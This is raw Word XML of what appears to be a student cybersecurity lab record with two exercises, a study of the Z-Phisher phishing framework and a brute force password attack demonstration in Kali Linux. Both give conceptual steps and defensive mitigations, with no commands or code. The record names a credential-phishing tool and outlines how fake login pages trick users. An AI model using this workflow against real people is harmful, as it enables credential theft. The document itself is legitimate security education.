    <w:p w14:paraId="759885CB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Study Tool: Z-Phisher (Open-Source GitHub Framework – Educational Use)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7751BCA5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System Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BF088B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RAM: Minimum 4 GB (8 GB recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB7870C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Disk Space: Minimum 30 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C4CD4D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Processor: Intel/AMD with Virtualization support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76082B54" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="720B7748" w14:textId="083FACD6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PROCEDURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEBFFE4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1: Start Kali Linux Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C495AF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Open Oracle VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AF3BD5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Start Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11972B61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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Log in using Kali credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A1E6BA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6F67E946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2: Study the Z-Phisher Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D15C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Visit the Z-Phisher GitHub repository (read-only study).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E808D7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Review documentation to understand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A812C0" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr>
        <w:ind w:left="720"/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Types of phishing templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E40B51" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr>
        <w:ind w:left="720"/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Social-engineering techniques used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48930BC6" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr>
        <w:ind w:left="720"/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Ethical usage warnings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA04F6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4C3793C1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3: Understand Phishing Attack Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2C316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Analyze how fake login pages mimic legitimate websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396EF6AF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Observe how users are tricked into entering credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FA6400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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Study the role of URL masking and trust exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9E49F5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50DB3854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4: Controlled Demonstration (Simulation Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050CD0C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Perform a local, consent-based simulation using dummy accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B10E3F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Observe how phishing pages appear to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7C5F14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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Analyze user response behavior (no real credentials used).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246E4E30" w14:textId="36BA3A64" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C66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585416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lastRenderedPageBreak/>
        <w:t>Step 5: Identify Security Risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9EB752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Credential theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB8AC5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Identity compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01379A7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Financial fraud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C5942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Privacy violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E34AB5D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39691703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6: Study Prevention Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA4B1D3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User awareness and phishing education</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C46961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Browser security warnings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF7B64E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Two-factor authentication (2FA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C19CE04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Email and URL filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550136B5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HTTPS and domain verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FECAA27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2A9CB3FE" w14:textId="437A23C5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OUTPUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B1E2E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Clear understanding of phishing techniques and attack flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B598FC8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Identification of social-engineering risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EDAE6A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Screenshots and notes recorded for academic reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1A805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082C1BE3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0A1D1AA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2436A5D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EBB183F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2BCCE061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9BCEA4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19F0757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03E849F3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D19D1D6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2D2DA62A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A538C85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092305C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68AC5452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9AFB94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7930C432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D0876E2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3E77F756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2B6B3628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33A614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1C8CB268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281B53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3A4912A4" w14:textId="05116E5A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RESULT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205CFA6B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The study of phishing attacks using the Z-Phisher framework was successfully completed in Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C26D93" w14:textId="680A5011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This experiment improved understanding of social-engineering threats and emphasized the importance of user awareness and defensive security practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F36ED6" w14:textId="1F27216F" w:rsidR="00C6689C" w:rsidRDefault="00C6689C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54967D5D" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1D47ACBE" w14:textId="611D2658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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="61BAC14C" w14:textId="279E3891" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="0090255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STUDY AND DEMONSTRATION OF BRUTE FORCE PASSWORD ATTACK IN A CONTROLLED KALI LINUX ENVIRONMENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C6689C" w14:paraId="0E20758A" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C54432F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7A23937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579D655" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="0090255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E49EFE0" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP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DD932C6" w14:textId="7F205062" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>AIM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>To study and demonstrate the concept of brute force password attacks in a controlled Kali Linux environment to understand password vulnerabilities and the importance of strong authentication mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77CA03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</w:p>
    <w:p w14:paraId="107DCDAB" w14:textId="5E67B7AF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SOFTWARE REQUIREMENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4547D6C9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Host Operating System:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows / Linux / macOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7007C9AA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Virtualization Software:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Oracle VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D06721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Guest Operating System:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57115E3D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Study Tools:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Open-source password auditing utilities (educational use only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505930BC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System Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AF8FB1" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr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RAM: Minimum 4 GB (8 GB recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52282249" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr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Disk Space: Minimum 30 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B83211" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr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Processor: Intel/AMD with Virtualization support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C18385" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="618F2680" w14:textId="4A8DB765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PROCEDURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC4F655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1: Start Kali Linux Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2B020E" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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Open Oracle VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FAB17F" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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Start Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567829E1" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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Log in using Kali credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674FD29" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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5AEB8749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2: Set Up a Controlled Test Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1E09A" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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 xml:space="preserve">Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>locally created test account</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>dummy authentication service</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0228B1" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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Ensure no real systems or credentials are involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE009B6" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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Confirm the environment is isolated from external networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E537C5" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E144E3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3: Study Brute Force Attack Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C9407" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689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Understand how login mechanisms validate credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D67A909" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> how attackers automate repeated login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCC859A" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689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Observe how password complexity affects attack feasibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67764D3D" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2E3BCA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4: Educational Demonstration (Simulation Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B87BDD" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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Simulate repeated authentication attempts using dummy data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D74B20F" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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Observe system responses such as delays or access denial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DFF56B" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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Record observations without executing real attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65975ACD" w14:textId="7A835C23" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689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page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD6C90A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEB3CD5" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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Weak or short passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37897F33" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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No rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E1921F" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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Missing account lockout policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AF6F19" w14:textId="77777777" w:rsid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Lack of multi-factor authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737BC8EA" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4608FE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6: Study Prevention and Mitigation Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D3DC3A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Strong password policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B482BF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Account lockout and rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C08C5E2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CAPTCHA mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079C498B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Multi-factor authentication (MFA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BE1631" w14:textId="77777777" w:rsid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Monitoring and alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6CB80" w14:textId="77777777" w:rsid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480C18D4" w14:textId="77777777" w:rsid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7FFFAD62" w14:textId="77777777" w:rsid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662A92E4" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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44660E39" w14:textId="4DA83775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OUTPUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3C71EF" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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Understanding of brute force attack concepts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB8D68" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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Identification of password-related security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369C8F5F" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C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Screenshots and notes recorded for academic reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B960A71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2CD93AF8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400711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C987BFA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71645616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20E0CE16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F651475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59A8117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1786D87C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80CEBC8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85D85B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768C9EFC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D5DF3B4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943C407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B8238C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6C808914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1BC7ED8E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1D4223FD" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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2F34F905" w14:textId="1E0A5D3C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RESULT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E41EF90" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:p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The study and demonstration of brute force password attacks were successfully completed in a controlled Kali Linux environment.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>The experiment emphasized the importance of strong passwords and robust authentication mechanisms to prevent unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48987EDC" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C6689C" w:rsidRPr="00C6689C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FDB8E" w14:textId="77777777" w:rsidR="000372FF" w:rsidRDefault="000372FF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4444AFA4" w14:textId="77777777" w:rsidR="000372FF" w:rsidRDefault="000372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A04C885F-E2A0-4AE7-98AE-EBFA87E2448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9EECC4-0410-44A2-839E-D3463ED5E0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F98FB3-45F1-4054-972B-E7AA32B07D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251BB" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRDefault="00EF7625">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="68565550" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRDefault="00EF76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5B4B9" w14:textId="77777777" w:rsidR="000372FF" w:rsidRDefault="000372FF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6B5AE825" w14:textId="77777777" w:rsidR="000372FF" w:rsidRDefault="000372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4556" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F442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A98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="389A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52CAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BAB4F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67521"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="799607E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CC36B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="154ED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3B60C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48CE8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1F1EE7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54408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4A5782"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B560B81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C15347"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12D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C298A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE2E8B7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7C51B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF34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839DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D243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C1433D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8DC2AF6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5A370E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C77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416A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5583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9E2E7C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2B83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BC3336"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB1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01620"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20107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4D2881"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C96E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455442"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6950BBC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8A2948"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0B6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66AC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4503BB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F4E7EEC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F04C5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FF4B1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D930C228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017174"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CD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F567A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05DAB80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6E1E4717"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC8A1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54679D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78445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BF1ABE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C441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F925590"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F4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129058">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="223689537">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="399982152">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="815680614">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1326275124">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1322611773">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="84032859">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1646473891">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="87697649">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="121922577">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="633215939">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1035156307">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="151607733">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="669257478">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1264071367">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1190995574">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1810391821">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="557205729">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1805733148">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1616475819">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1773816102">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="547110966">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="10249450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842743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27528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187714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01098738">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="829561710">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="16599160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251"/>
    <w:rsid w:val="000372FF"/>
    <w:rsid w:val="000F4FFB"/>
    <w:rsid w:val="001F7817"/>
    <w:rsid w:val="00220FC3"/>
    <w:rsid w:val="003E5557"/>
    <w:rsid w:val="004A46D5"/>
    <w:rsid w:val="004C6F75"/>
    <w:rsid w:val="004D6A09"/>
